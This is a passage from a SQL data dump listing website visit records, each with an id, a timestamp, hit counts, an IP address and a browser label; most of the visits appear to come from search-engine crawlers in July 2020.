6.249.70.69','chrome'),(521317,1594338225,3,3,0,0,'66.249.70.70','chrome'),(521318,1594338259,2,2,0,0,'157.55.39.236','other'),(521319,1594338728,1,1,0,0,'178.154.200.222','other'),(521320,1594338771,8,8,0,0,'185.11.82.228','other'),(521321,1594338907,1,1,0,0,'62.205.134.182','other'),(521322,1594339019,4,4,0,0,'66.249.70.69','chrome'),(521323,1594339270,1,1,0,0,'157.55.39.236','other'),(521324,1594339274,3,3,0,0,'66.249.64.36','chrome'),(521325,1594339416,2,2,0,0,'207.46.13.222','other'),(521326,1594339551,3,3,0,0,'66.249.70.72','chrome'),(521327,1594339689,2,2,0,0,'66.249.70.70','chrome'),(521328,1594339836,2,2,0,0,'8.29.198.27','other'),(521329,1594340014,8,8,0,0,'185.11.82.228','other'),(521330,1594340030,5,5,0,0,'66.249.70.69','chrome'),(521331,1594340655,1,1,0,0,'70.37.86.52','chrome'),(521332,1594340662,5,5,0,0,'66.249.70.70','chrome'),(521333,1594340696,1,1,0,0,'66.249.64.33','chrome'),(521334,1594340757,3,3,0,0,'66.249.64.38','chrome'),(521335,1594340758,5,5,0,0,'66.249.70.72','chrome'),(521336,1594340838,2,2,0,0,'66.249.64.36','chrome'),(521337,1594341002,3,3,0,0,'66.249.70.69','chrome'),(521338,1594341263,8,8,0,0,'185.11.82.228','other'),(521339,1594341353,1,1,0,0,'207.46.13.222','other'),(521340,1594341609,4,4,0,0,'66.249.70.70','chrome'),(521341,1594342497,8,8,0,0,'185.11.82.228','other'),(521342,1594342513,9,9,0,0,'66.249.70.69','chrome'),(521343,1594342845,3,3,0,0,'66.249.70.72','chrome'),(521344,1594342884,1,1,0,0,'66.249.70.70','chrome'),(521345,1594343751,8,8,0,0,'185.11.82.228','other'),(521346,1594344016,3,3,0,0,'66.249.70.69','chrome'),(521347,1594344184,1,1,0,0,'66.249.70.70','chrome'),(521348,1594344220,1,1,0,0,'66.249.64.38','chrome'),(521349,1594344653,1,1,0,0,'66.249.64.33','chrome'),(521350,1594344702,1,1,0,0,'178.154.200.196','other'),(521351,1594344792,1,1,0,0,'178.154.200.207','other'),(521352,1594344953,1,1,0,0,'66.249.70.72','chrome'),(521353,1594344976,2,2,0,0,'66.249.70.69','chrome'),(521354,1594345005,8,8,0,0,'185.11.82.228','other'),(521355,1594346260,8,8,0,0,'185.11.82.228','other'),(521356,1594346373,2,2,0,0,'66.249.70.70','chrome'),(521357,1594346483,1,1,0,0,'66.249.70.69','chrome'),(521358,1594346785,1,1,0,0,'66.249.70.72','chrome'),(521359,1594347341,1,1,0,0,'37.73.206.170','chrome'),(521360,1594347462,2,2,0,0,'66.249.64.36','chrome'),(521361,1594347504,1,1,0,0,'207.46.13.195','other'),(521362,1594347582,8,8,0,0,'185.11.82.228','other'),(521363,1594347785,1,1,0,0,'213.180.203.16','other'),(521364,1594347807,3,3,0,0,'66.249.70.72','chrome'),(521365,1594348874,3,3,0,0,'66.249.70.70','chrome'),(521366,1594348877,8,8,0,0,'185.11.82.228','other'),(521367,1594349005,1,1,0,0,'66.249.64.36','chrome'),(521368,1594349707,1,1,0,0,'194.61.24.94','other'),(521369,1594350167,1,1,0,0,'66.249.70.70','chrome'),(521370,1594350227,8,8,0,0,'185.11.82.228','other'),(521371,1594350408,1,1,0,0,'185.15.56.22','other'),(521372,1594350663,2,2,0,0,'8.29.198.27','other'),(521373,1594351460,2,2,0,0,'66.249.70.72','chrome'),(521374,1594351772,1,1,0,0,'66.249.70.70','chrome'),(521375,1594351877,8,8,0,0,'185.11.82.228','other'),(521376,1594352077,1,1,0,0,'66.249.70.69','chrome'),(521377,1594352933,1,1,0,0,'109.248.200.246','chrome'),(521378,1594353199,8,8,0,0,'185.11.82.228','other'),(521379,1594353439,2,2,0,0,'66.249.64.38','chrome'),(521380,1594353851,1,0,1,0,'66.249.64.33',''),(521381,1594353996,1,1,0,0,'66.249.70.70','chrome'),(521382,1594354568,8,8,0,0,'185.11.82.228','other'),(521383,1594355568,1,1,0,0,'131.220.6.152','chrome'),(521384,1594355933,8,8,0,0,'185.11.82.228','other'),(521385,1594356700,1,1,0,0,'62.205.134.182','other'),(521386,1594357280,8,8,0,0,'185.11.82.228','other'),(521387,1594358164,1,1,0,0,'66.249.64.38','chrome'),(521388,1594358484,1,1,0,0,'17.58.99.7','other'),(521389,1594358609,8,8,0,0,'185.11.82.228','other'),(521390,1594359915,1,1,0,0,'212.1.124.210','chrome'),(521391,1594359947,1,1,0,0,'207.46.13.159','other'),(521392,1594359973,8,8,0,0,'185.11.82.228','other'),(521393,1594360063,1,1,0,0,'91.196.178.77','chrome'),(521394,1594360629,1,1,0,0,'66.249.70.72','chrome'),(521395,1594360740,1,1,0,0,'178.154.200.236','other'),(521396,1594361351,8,8,0,0,'185.11.82.228','other'),(521397,1594361385,1,1,0,0,'91.196.178.77','chrome'),(521398,1594361488,2,2,0,0,'8.29.198.25','other'),(521399,1594362496,1,1,0,0,'91.196.178.91','chrome'),(521400,1594362606,1,1,0,0,'91.196.177.46','chrome'),(521401,1594362754,8,8,0,0,'185.11.82.228','other'),(521402,1594363052,1,1,0,0,'209.17.96.226','other'),(521403,1594363125,1,1,0,0,'94.244.170.201','chrome'),(521404,1594363254,2,2,0,0,'91.196.178.77','chrome'),(521405,1594363369,1,1,0,0,'213.180.203.29','other'),(521406,1594363516,1,1,0,0,'157.55.39.91','other'),(521407,1594363519,1,1,0,0,'66.249.70.69','chrome'),(521408,1594364216,8,8,0,0,'185.11.82.228','other'),(521409,1594364394,1,1,0,0,'91.196.178.77','chrome'),(521410,1594365446,1,1,0,0,'77.222.134.102','chrome'),(521411,1594365646,8,8,0,0,'185.11.82.228','other'),(521412,1594366022,1,1,0,0,'178.154.200.220','other'),(521413,1594366658,2,2,0,0,'207.46.13.102','other'),(521414,1594367162,1,1,0,0,'207.46.13.85','other'),(521415,1594367204,8,8,0,0,'185.11.82.228','other'),(521416,1594367278,1,1,0,0,'66.249.64.36','chrome'),(521417,1594367359,2,2,0,0,'66.249.70.70','chrome'),(521418,1594367622,1,1,0,0,'178.154.200.220','other'),(521419,1594368518,1,1,0,0,'178.154.200.216','other'),(521420,1594368718,1,1,0,0,'178.154.200.222','other'),(521421,1594368763,8,8,0,0,'185.11.82.228','other'),(521422,1594369130,1,1,0,0,'66.249.70.72','chrome'),(521423,1594369403,1,1,0,0,'66.249.70.70','chrome'),(521424,1594369407,1,1,0,0,'207.46.13.246','other'),(521425,1594369418,2,1,1,0,'66.249.70.69',''),(521426,1594369865,1,1,0,0,'91.196.178.77','chrome'),(521427,1594370358,8,8,0,0,'185.11.82.228','other'),(521428,1594370407,1,1,0,0,'66.249.70.70','chrome'),(521429,1594370714,2,2,0,0,'66.249.70.69','chrome'),(521430,1594370776,1,1,0,0,'66.249.64.38','chrome'),(521431,1594371150,2,2,0,0,'91.196.178.77','chrome'),(521432,1594371162,2,2,0,0,'66.249.70.72','chrome'),(521433,1594371401,1,1,0,0,'66.249.64.36','chrome'),(521434,1594371414,2,2,0,0,'66.249.64.33','chrome'),(521435,1594371910,1,1,0,0,'66.249.70.69','chrome'),(521436,1594372044,8,8,0,0,'185.11.82.228','other'),(521437,1594372129,1,1,0,0,'92.113.190.72','chrome'),(521438,1594372225,4,4,0,0,'66.249.70.72','chrome'),(521439,1594372315,2,2,0,0,'8.29.198.25','other'),(521440,1594372725,1,1,0,0,'83.170.243.206','chrome'),(521441,1594372879,7,7,0,0,'66.249.70.69','chrome'),(521442,1594372979,1,1,0,0,'66.249.64.36','chrome'),(521443,1594372991,1,1,0,0,'157.55.39.91','other'),(521444,1594373011,12,11,1,0,'66.249.70.70',''),(521445,1594373283,5,5,0,0,'66.249.70.72','chrome'),(521446,1594373714,1,1,0,0,'178.154.200.92','other'),(521447,1594373737,1,1,0,0,'213.180.203.16','chrome'),(521448,1594373751,2,2,0,0,'213.180.203.90','chrome'),(521449,1594373754,8,8,0,0,'185.11.82.228','other'),(521450,1594373755,2,2,0,0,'5.255.253.82','chrome'),(521451,1594373756,2,2,0,0,'178.154.200.196','chrome'),(521452,1594373758,1,1,0,0,'178.154.200.222','chrome'),(521453,1594373760,1,1,0,0,'178.154.200.236','chrome'),(521454,1594373762,1,1,0,0,'178.154.200.112','chrome'),(521455,1594373763,1,1,0,0,'213.180.203.122','chrome'),(521456,1594373765,1,1,0,0,'213.180.203.109','chrome'),(521457,1594373802,1,1,0,0,'178.154.200.222','other'),(521458,1594373922,4,4,0,0,'66.249.70.69','chrome'),(521459,1594374383,9,9,0,0,'66.249.70.70','chrome'),(521460,1594374411,2,2,0,0,'66.249.64.36','chrome'),(521461,1594374435,2,2,0,0,'178.251.109.249','chrome'),(521462,1594374681,2,2,0,0,'66.249.70.72','chrome'),(521463,1594374879,5,5,0,0,'66.249.70.69','chrome'),(521464,1594375084,3,3,0,0,'66.249.64.38','chrome'),(521465,1594375341,2,2,0,0,'66.249.70.70','chrome'),(521466,1594375506,8,8,0,0,'185.11.82.228','other'),(521467,1594375785,1,1,0,0,'18.207.136.107','chrome'),(521468,1594376023,3,3,0,0,'66.249.70.72','chrome'),(521469,1594376061,3,3,0,0,'66.249.70.69','chrome'),(521470,1594376627,7,7,0,0,'66.249.70.70','chrome'),(521471,1594376663,1,1,0,0,'66.249.64.33','chrome'),(521472,1594376700,1,1,0,0,'46.201.203.139','firefox'),(521473,1594376846,3,3,0,0,'66.249.64.38','chrome'),(521474,1594376946,1,1,0,0,'66.249.70.72','chrome'),(521475,1594376985,6,6,0,0,'66.249.70.69','chrome'),(521476,1594377446,8,8,0,0,'185.11.82.228','other'),(521477,1594377902,1,1,0,0,'66.249.64.33','chrome'),(521478,1594377992,1,0,1,0,'66.249.64.36',''),(521479,1594378014,2,2,0,0,'66.249.64.36','chrome'),(521480,1594378353,1,1,0,0,'66.249.70.72','chrome'),(521481,1594378417,4,4,0,0,'66.249.70.69','chrome'),(521482,1594378595,1,1,0,0,'207.46.13.181','other'),(521483,1594378723,1,1,0,0,'66.249.64.38','chrome'),(521484,1594378806,2,2,0,0,'66.249.64.33','chrome'),(521485,1594379049,2,2,0,0,'66.249.70.70','chrome'),(521486,1594379088,1,1,0,0,'213.180.203.16','other'),(521487,1594379550,8,8,0,0,'185.11.82.228','other'),(521488,1594379636,1,1,0,0,'66.249.64.36','chrome'),(521489,1594380000,2,2,0,0,'66.249.70.69','chrome'),(521490,1594380177,2,2,0,0,'66.249.70.70','chrome'),(521491,1594380230,3,3,0,0,'66.249.70.72','chrome'),(521492,1594380487,1,1,0,0,'109.74.154.72','chrome'),(521493,1594380769,1,1,0,0,'91.196.178.161','chrome'),(521494,1594381088,1,1,0,0,'91.196.177.15','chrome'),(521495,1594381108,1,1,0,0,'17.58.99.7','other'),(521496,1594381167,1,1,0,0,'66.249.70.69','chrome'),(521497,1594381207,1,1,0,0,'66.249.70.72','chrome'),(521498,1594381218,1,1,0,0,'66.249.70.70','chrome'),(521499,1594381390,1,1,0,0,'66.249.64.33','chrome'),(521500,1594381399,1,1,0,0,'91.196.178.77','chrome'),(521501,1594381846,8,8,0,0,'185.11.82.228','other'),(521502,1594382285,1,1,0,0,'66.249.70.70','chrome'),(521503,1594382634,1,1,0,0,'207.46.13.181','other'),(521504,1594382781,1,1,0,0,'91.197.186.163','chrome'),(521505,1594383142,1,1,0,0,'8.29.198.25','other'),(521506,1594383263,1,1,0,0,'8.29.198.27','other'),(521507,1594383572,1,1,0,0,'66.249.70.70','chrome'),(521508,1594384081,8,8,0,0,'185.11.82.228','other'),(521509,1594384207,4,4,0,0,'66.249.70.69','chrome'),(521510,1594384270,1,1,0,0,'66.249.70.72','chrome'),(521511,1594384967,1,1,0,0,'178.154.200.222','other'),(521512,1594385278,1,1,0,0,'207.46.13.90','other'),(521513,1594385858,1,1,0,0,'207.46.13.233','other'),(521514,1594386095,2,2,0,0,'66.249.70.69','chrome'),(521515,1594386566,8,8,0,0,'185.11.82.228','other'),(521516,1594386693,1,1,0,0,'66.249.64.36','chrome'),(521517,1594386995,1,1,0,0,'66.249.70.72','chrome'),(521518,1594386999,1,0,1,0,'66.249.70.69',''),(521519,1594387133,1,1,0,0,'66.249.70.69','chrome'),(521520,1594387509,1,1,0,0,'2.47.39.211','other'),(521521,1594387690,1,1,0,0,'178.154.200.97','other'),(521522,1594387909,1,1,0,0,'66.249.70.72','chrome'),(521523,1594388070,2,2,0,0,'66.249.70.69','chrome'),(521524,1594388421,2,2,0,0,'66.249.64.36','chrome'),(521525,1594388880,1,1,0,0,'66.249.66.36','chrome'),(521526,1594389260,8,8,0,0,'185.11.82.228','other'),(521527,1594391005,1,1,0,0,'66.249.70.69','chrome'),(521528,1594391604,1,1,0,0,'88.155.153.45','chrome'),(521529,1594392328,8,8,0,0,'185.11.82.228','other'),(521530,1594392654,1,1,0,0,'66.249.70.69','chrome'),(521531,1594393319,7,7,0,0,'18.208.126.130','other'),(521532,1594393970,1,1,0,0,'8.29.198.26','other'),(521533,1594394084,1,1,0,0,'8.29.198.25','other'),(521534,1594394176,1,1,0,0,'213.180.203.17','other'),(521535,1594394248,8,8,0,0,'18.208.126.130','other'),(521536,1594394289,1,1,0,0,'207.46.13.90','other'),(521537,1594394533,1,1,0,0,'196.247.180.148','msie'),(521538,1594395142,1,1,0,0,'157.55.39.65','other'),(521539,1594395224,7,7,0,0,'18.208.126.130','other'),(521540,1594396166,8,8,0,0,'18.208.126.130','other'),(521541,1594396231,8,8,0,0,'185.11.82.228','other'),(521542,1594396281,1,1,0,0,'178.154.200.92','other'),(521543,1594396653,1,1,0,0,'207.46.13.181','other'),(521544,1594397136,5,5,0,0,'18.208.126.130','other'),(521545,1594397471,1,1,0,0,'212.102.33.249','chrome'),(521546,1594397632,1,1,0,0,'17.58.99.7','other'),(521547,1594397673,1,1,0,0,'66.249.70.69','chrome'),(521548,1594397682,1,1,0,0,'157.55.39.226','other'),(521549,1594398414,6,6,0,0,'18.208.126.130','other'),(521550,1594399474,7,7,0,0,'18.208.126.130','other'),(521551,1594400414,5,5,0,0,'18.208.126.130','other'),(521552,1594401017,8,8,0,0,'185.11.82.228','other'),(521553,1594401070,2,2,0,0,'216.18.204.154','firefox'),(521554,1594401389,3,3,0,0,'18.208.126.130','other'),(521555,1594402742,1,1,0,0,'178.154.200.196','other'),(521556,1594403892,1,1,0,0,'207.46.13.90','other'),(521557,1594404517,8,8,0,0,'185.11.82.228','other'),(521558,1594404793,1,1,0,0,'8.29.198.25','other'),(521559,1594404906,1,1,0,0,'8.29.198.27','other'),(521560,1594405577,1,1,0,0,'213.180.203.16','other'),(521561,1594405722,1,1,0,0,'88.155.45.9','chrome'),(521562,1594406115,1,1,0,0,'66.249.70.70','chrome'),(521563,1594406317,8,8,0,0,'185.11.82.228','other'),(521564,1594407415,1,1,0,0,'207.46.13.90','other'),(521565,1594407497,1,1,0,0,'91.196.178.79','chrome'),(521566,1594407681,8,8,0,0,'216.18.204.154','firefox'),(521567,1594407875,8,8,0,0,'185.11.82.228','other'),(521568,1594409711,8,8,0,0,'185.11.82.228','other'),(521569,1594410622,1,1,0,0,'213.180.203.17','other'),(521570,1594410724,1,1,0,0,'178.154.200.222','other'),(521571,1594412139,1,1,0,0,'178.154.200.222','other'),(521572,1594412637,1,0,1,0,'66.249.70.72',''),(521573,1594412676,1,1,0,0,'66.249.70.72','chrome'),(521574,1594413436,1,1,0,0,'213.180.203.16','other'),(521575,1594414264,8,8,0,0,'185.11.82.228','other'),(521576,1594415619,1,1,0,0,'8.29.198.26','other'),(521577,1594415729,1,1,0,0,'8.29.198.25','other'),(521578,1594415746,1,1,0,0,'178.154.200.222','other'),(521579,1594415921,1,1,0,0,'66.249.64.38','chrome'),(521580,1594416086,8,8,0,0,'185.11.82.228','other'),(521581,1594417038,1,1,0,0,'154.51.131.142','chrome'),(521582,1594417734,8,8,0,0,'185.11.82.228','other'),(521583,1594418065,1,1,0,0,'188.191.233.57','firefox'),(521584,1594418445,1,1,0,0,'66.249.70.70','chrome'),(521585,1594419435,8,8,0,0,'185.11.82.228','other'),(521586,1594419509,1,1,0,0,'178.154.200.222','other'),(521587,1594419675,1,1,0,0,'66.249.70.69','chrome'),(521588,1594420633,1,1,0,0,'178.154.200.222','other'),(521589,1594421224,8,8,0,0,'185.11.82.228','other'),(521590,1594421274,3,3,0,0,'207.46.13.65','other'),(521591,1594421521,1,1,0,0,'188.115.137.199','chrome'),(521592,1594423038,1,1,0,0,'178.154.200.222','other'),(521593,1594423186,1,1,0,0,'213.180.203.16','other'),(521594,1594424723,1,1,0,0,'207.46.13.227','other'),(521595,1594425307,1,1,0,0,'62.205.134.182','other'),(521596,1594425849,1,1,0,0,'194.61.24.94','other'),(521597,1594425909,1,1,0,0,'66.249.70.70','chrome'),(521598,1594426439,1,1,0,0,'207.46.13.163','other'),(521599,1594426441,2,2,0,0,'8.29.198.26','other'),(521600,1594427535,1,1,0,0,'207.46.13.3','other'),(521601,1594427869,1,1,0,0,'66.249.70.69','chrome'),(521602,1594428255,1,1,0,0,'207.46.13.227','other'),(521603,1594428940,1,1,0,0,'207.46.13.3','other'),(521604,1594429198,1,1,0,0,'66.249.70.70','chrome'),(521605,1594430379,8,8,0,0,'185.11.82.228','other'),(521606,1594431737,1,1,0,0,'207.46.13.227','other'),(521607,1594432087,8,8,0,0,'185.11.82.228','other'),(521608,1594432345,1,1,0,0,'17.58.99.90','other'),(521609,1594433070,1,1,0,0,'213.180.203.16','chrome'),(521610,1594433098,1,1,0,0,'178.154.200.222','other'),(521611,1594433774,8,8,0,0,'185.11.82.228','other'),(521612,1594434997,1,1,0,0,'207.46.13.227','other'),(521613,1594435741,8,8,0,0,'185.11.82.228','other'),(521614,1594436196,1,1,0,0,'207.46.13.65','other'),(521615,1594437029,1,1,0,0,'17.58.99.7','other'),(521616,1594437133,2,2,0,0,'207.46.13.65','other'),(521617,1594437247,1,1,0,0,'207.46.13.227','other'),(521618,1594437273,1,1,0,0,'8.29.198.25','other'),(521619,1594437374,1,1,0,0,'8.29.198.27','other'),(521620,1594438186,1,1,0,0,'207.46.13.227','other'),(521621,1594439409,1,1,0,0,'185.23.105.109','chrome'),(521622,1594439482,1,1,0,0,'207.46.13.227','other'),(521623,1594439770,1,1,0,0,'207.46.13.65','other'),(521624,1594439987,1,1,0,0,'66.249.64.38','chrome'),(521625,1594442040,1,1,0,0,'131.220.6.152','chrome'),(521626,1594442044,8,8,0,0,'185.11.82.228','other'),(521627,1594442587,1,1,0,0,'207.46.13.3','other'),(521628,1594443024,1,1,0,0,'62.205.134.182','other'),(521629,1594443601,2,2,0,0,'207.46.13.227','other'),(521630,1594445293,1,1,0,0,'91.123.146.45','chrome'),(521631,1594445302,8,8,0,0,'185.11.82.228','other'),(521632,1594446120,1,1,0,0,'207.46.13.227','other'),(521633,1594446403,1,1,0,0,'207.46.13.65','other'),(521634,1594447645,1,1,0,0,'66.249.64.36','chrome'),(521635,1594447655,2,2,0,0,'66.249.70.70','chrome'),(521636,1594447917,8,8,0,0,'185.11.82.228','other'),(521637,1594448110,1,1,0,0,'8.29.198.27','other'),(521638,1594448197,1,1,0,0,'8.29.198.26','other'),(521639,1594448506,1,1,0,0,'207.46.13.3','other'),(521640,1594449223,1,1,0,0,'207.46.13.227','other'),(521641,1594452002,2,2,0,0,'66.249.70.69','chrome'),(521642,1594452100,2,2,0,0,'207.46.13.3','other'),(521643,1594452858,8,8,0,0,'185.11.82.228','other'),(521644,1594452878,1,1,0,0,'66.249.70.72','chrome'),(521645,1594453957,1,1,0,0,'207.46.13.65','other'),(521646,1594454729,8,8,0,0,'185.11.82.228','other'),(521647,1594455745,3,3,0,0,'3.12.160.132','chrome'),(521648,1594458946,2,2,0,0,'8.29.198.26','other'),(521649,1594459893,2,2,0,0,'66.249.70.72','chrome'),(521650,1594459935,1,1,0,0,'207.46.13.227','other'),(521651,1594460197,1,1,0,0,'66.249.70.69','chrome'),(521652,1594461142,1,1,0,0,'17.58.99.7','other'),(521653,1594461793,8,8,0,0,'185.11.82.228','other'),(521654,1594462092,1,1,0,0,'66.249.64.38','chrome'),(521655,1594462276,1,1,0,0,'66.249.70.69','chrome'),(521656,1594463549,8,8,0,0,'185.11.82.228','other'),(521657,1594463595,10,10,0,0,'216.18.204.154','firefox'),(521658,1594463755,1,1,0,0,'207.46.13.65','other'),(521659,1594465564,1,1,0,0,'66.249.64.36','chrome'),(521660,1594465641,1,1,0,0,'66.249.64.38','chrome'),(521661,1594466326,9,9,0,0,'216.18.204.154','firefox'),(521662,1594466426,1,1,0,0,'207.46.13.65','other'),(521663,1594466612,1,1,0,0,'109.74.154.72','chrome'),(521664,1594466713,1,1,0,0,'207.46.13.227','other'),(521665,1594468153,8,8,0,0,'185.11.82.228','other'),(521666,1594468917,1,1,0,0,'207.46.13.227','other'),(521667,1594469027,1,1,0,0,'66.249.70.69','chrome'),(521668,1594469108,1,1,0,0,'66.249.64.38','chrome'),(521669,1594469181,1,1,0,0,'66.249.70.72','chrome'),(521670,1594469781,2,2,0,0,'8.29.198.27','other'),(521671,1594470020,8,8,0,0,'185.11.82.228','other'),(521672,1594470220,1,1,0,0,'66.249.70.72','chrome'),(521673,1594471118,10,10,0,0,'216.18.204.154','firefox'),(521674,1594471235,1,1,0,0,'66.249.70.72','chrome'),(521675,1594472292,10,10,0,0,'216.18.204.154','firefox'),(521676,1594472354,1,1,0,0,'66.249.70.69','chrome'),(521677,1594472518,1,1,0,0,'207.46.13.227','other'),(521678,1594473641,1,1,0,0,'207.46.13.227','other'),(521679,1594473758,1,1,0,0,'17.58.99.7','other'),(521680,1594474733,1,1,0,0,'66.249.64.33','chrome'),(521681,1594475354,2,2,0,0,'91.209.11.236','other'),(521682,1594475732,1,1,0,0,'207.46.13.227','other'),(521683,1594476102,8,8,0,0,'185.11.82.228','other'),(521684,1594476820,1,1,0,0,'66.249.70.72','chrome'),(521685,1594477051,11,11,0,0,'216.18.204.154','firefox'),(521686,1594477088,1,1,0,0,'66.249.70.69','chrome'),(521687,1594477622,1,1,0,0,'178.154.200.222','other'),(521688,1594478329,8,8,0,0,'185.11.82.228','other'),(521689,1594479638,7,7,0,0,'94.130.9.183','other'),(521690,1594480545,7,7,0,0,'94.130.9.183','other'),(521691,1594480612,1,1,0,0,'8.29.198.26','other'),(521692,1594480661,1,1,0,0,'8.29.198.27','other'),(521693,1594481227,1,1,0,0,'70.37.86.52','chrome'),(521694,1594481450,7,7,0,0,'94.130.9.183','other'),(521695,1594482407,8,8,0,0,'185.11.82.228','other'),(521696,1594482448,4,4,0,0,'94.130.9.183','other'),(521697,1594482745,1,1,0,0,'66.249.70.72','chrome'),(521698,1594482799,3,3,0,0,'66.249.70.69','chrome'),(521699,1594482852,1,1,0,0,'66.249.70.70','chrome'),(521700,1594483350,2,2,0,0,'94.130.9.183','other'),(521701,1594483418,1,1,0,0,'92.113.127.215','chrome'),(521702,1594484450,1,1,0,0,'207.46.13.65','other'),(521703,1594484483,1,1,0,0,'66.249.64.38','chrome'),(521704,1594484665,1,1,0,0,'178.154.200.222','other'),(521705,1594484670,1,1,0,0,'93.78.242.34','chrome'),(521706,1594485179,6,6,0,0,'18.208.126.130','other'),(521707,1594485256,8,8,0,0,'185.11.82.228','other'),(521708,1594486120,7,7,0,0,'18.208.126.130','other'),(521709,1594487136,5,5,0,0,'18.208.126.130','other'),(521710,1594487779,10,10,0,0,'216.18.204.154','firefox'),(521711,1594488049,4,4,0,0,'18.208.126.130','other'),(521712,1594488969,7,7,0,0,'18.208.126.130','other'),(521713,1594489159,1,1,0,0,'209.17.96.202','other'),(521714,1594489166,1,1,0,0,'178.154.200.222','other'),(521715,1594489244,1,1,0,0,'178.154.200.196','other'),(521716,1594489846,1,1,0,0,'66.249.70.70','chrome'),(521717,1594489971,7,7,0,0,'18.208.126.130','other'),(521718,1594490405,10,10,0,0,'216.18.204.154','firefox'),(521719,1594490431,8,8,0,0,'185.11.82.228','other'),(521720,1594491017,5,5,0,0,'18.208.126.130','other'),(521721,1594491435,2,2,0,0,'8.29.198.25','other'),(521722,1594492210,8,8,0,0,'18.208.126.130','other'),(521723,1594492634,8,8,0,0,'185.11.82.228','other'),(521724,1594492814,1,1,0,0,'66.249.70.70','chrome'),(521725,1594493114,3,3,0,0,'18.208.126.130','other'),(521726,1594494097,4,4,0,0,'18.208.126.130','other'),(521727,1594494378,1,1,0,0,'178.154.200.222','other'),(521728,1594495276,1,1,0,0,'66.249.64.36','chrome'),(521729,1594495290,1,1,0,0,'178.154.200.222','other'),(521730,1594495707,2,2,0,0,'207.46.13.65','other'),(521731,1594496183,1,1,0,0,'144.217.71.103','other'),(521732,1594496214,1,1,0,0,'144.217.71.103','chrome'),(521733,1594496224,1,1,0,0,'51.77.246.200','other'),(521734,1594496288,1,1,0,0,'66.249.70.72','chrome'),(521735,1594496941,1,1,0,0,'66.249.70.70','chrome'),(521736,1594497081,2,2,0,0,'178.154.200.196','other'),(521737,1594497090,8,8,0,0,'185.11.82.228','other'),(521738,1594497399,1,1,0,0,'209.59.139.148','chrome'),(521739,1594498014,1,1,0,0,'66.249.64.36','chrome'),(521740,1594498040,1,1,0,0,'178.154.200.220','other'),(521741,1594498536,2,2,0,0,'207.46.13.227','other'),(521742,1594498540,1,1,0,0,'207.46.13.125','other'),(521743,1594498962,2,2,0,0,'66.249.70.70','chrome'),(521744,1594499391,1,1,0,0,'46.235.40.49','chrome'),(521745,1594499508,1,1,0,0,'178.154.200.220','other'),(521746,1594499584,1,1,0,0,'66.249.64.33','chrome'),(521747,1594499781,1,1,0,0,'213.180.203.16','other'),(521748,1594499870,1,1,0,0,'17.58.99.7','other'),(521749,1594499926,2,2,0,0,'66.249.70.69','chrome'),(521750,1594500219,1,1,0,0,'66.249.70.72','chrome'),(521751,1594500587,1,1,0,0,'194.61.24.94','other'),(521752,1594500797,2,2,0,0,'66.249.70.70','chrome'),(521753,1594501060,1,1,0,0,'87.236.20.17','chrome'),(521754,1594501105,1,1,0,0,'178.154.200.216','other'),(521755,1594501157,1,1,0,0,'66.249.64.38','chrome'),(521756,1594501370,2,2,0,0,'51.68.11.215','chrome'),(521757,1594501566,2,2,0,0,'66.249.70.72','chrome'),(521758,1594501573,3,3,0,0,'66.249.64.33','chrome'),(521759,1594501767,1,0,1,0,'66.249.70.69',''),(521760,1594502225,1,1,0,0,'66.147.238.141','chrome'),(521761,1594502262,1,1,0,0,'8.29.198.26','other'),(521762,1594502305,1,1,0,0,'8.29.198.27','other'),(521763,1594502656,1,1,0,0,'81.88.49.50','chrome'),(521764,1594502657,1,1,0,0,'81.88.49.36','chrome'),(521765,1594502667,1,1,0,0,'81.88.49.3','chrome'),(521766,1594502708,2,2,0,0,'66.249.70.72','chrome'),(521767,1594503403,3,3,0,0,'66.249.70.70','chrome'),(521768,1594503676,1,1,0,0,'178.154.200.222','other'),(521769,1594503688,1,1,0,0,'66.249.64.36','chrome'),(521770,1594503812,1,1,0,0,'178.154.200.97','other'),(521772,1594504337,3,3,0,0,'66.249.70.69','chrome'),(521773,1594504354,1,1,0,0,'178.154.200.236','other'),(521774,1594504388,5,5,0,0,'66.249.70.70','chrome'),(521775,1594505010,3,3,0,0,'66.249.70.72','chrome'),(521776,1594505454,4,4,0,0,'185.92.73.236','chrome'),(521777,1594505517,1,1,0,0,'66.249.70.69','chrome'),(521778,1594505627,1,1,0,0,'66.249.70.70','chrome'),(521779,1594505852,1,1,0,0,'81.173.112.207','other'),(521780,1594505983,1,1,0,0,'142.93.182.135','chrome'),(521781,1594506234,1,1,0,0,'178.154.200.222','other'),(521782,1594506393,1,1,0,0,'66.249.64.33','chrome'),(521783,1594506768,1,1,0,0,'66.249.64.36','chrome'),(521784,1594506850,6,6,0,0,'66.249.70.70','chrome'),(521785,1594506924,8,8,0,0,'66.249.70.69','chrome'),(521786,1594507024,4,4,0,0,'66.249.70.72','chrome'),(521787,1594507037,1,1,0,0,'52.5.40.222','chrome'),(521788,1594507038,1,1,0,0,'96.47.227.216','chrome'),(521789,1594507098,1,1,0,0,'213.180.203.17','other'),(521790,1594507317,1,1,0,0,'178.154.200.92','other'),(521791,1594507620,1,1,0,0,'5.255.253.82','other'),(521792,1594508546,3,3,0,0,'66.249.70.72','chrome'),(521793,1594508624,2,2,0,0,'66.249.64.33','chrome'),(521794,1594508630,3,3,0,0,'66.249.70.70','chrome'),(521795,1594508794,2,2,0,0,'66.249.70.69','chrome'),(521796,1594508882,1,1,0,0,'178.154.200.222','other'),(521797,1594509112,1,1,0,0,'186.233.144.213','chrome'),(521798,1594509113,1,1,0,0,'178.154.200.112','other'),(521799,1594509451,2,2,0,0,'103.31.232.173','chrome'),(521800,1594509731,2,2,0,0,'66.249.70.72','chrome'),(521801,1594509741,3,3,0,0,'66.249.70.69','chrome'),(521802,1594509780,1,1,0,0,'66.249.64.38','chrome'),(521803,1594509899,3,3,0,0,'178.154.200.222','other'),(521804,1594509941,7,7,0,0,'66.249.70.70','chrome'),(521805,1594510313,1,1,0,0,'3.129.14.221','chrome'),(521806,1594510649,2,2,0,0,'72.52.238.73','chrome'),(521807,1594510727,1,1,0,0,'178.154.200.196','other'),(521808,1594510837,1,1,0,0,'178.154.200.222','other'),(521809,1594510990,3,3,0,0,'66.249.70.72','chrome'),(521810,1594511099,1,1,0,0,'66.249.64.36','chrome'),(521811,1594511527,8,8,0,0,'185.11.82.228','other'),(521812,1594511707,1,1,0,0,'62.205.134.182','other'),(521813,1594511714,7,7,0,0,'66.249.70.70','chrome'),(521814,1594511836,3,3,0,0,'66.249.70.69','chrome'),(521815,1594511848,1,1,0,0,'66.249.64.33','chrome'),(521816,1594511893,1,1,0,0,'66.249.64.38','chrome'),(521817,1594511954,1,1,0,0,'207.46.13.125','other'),(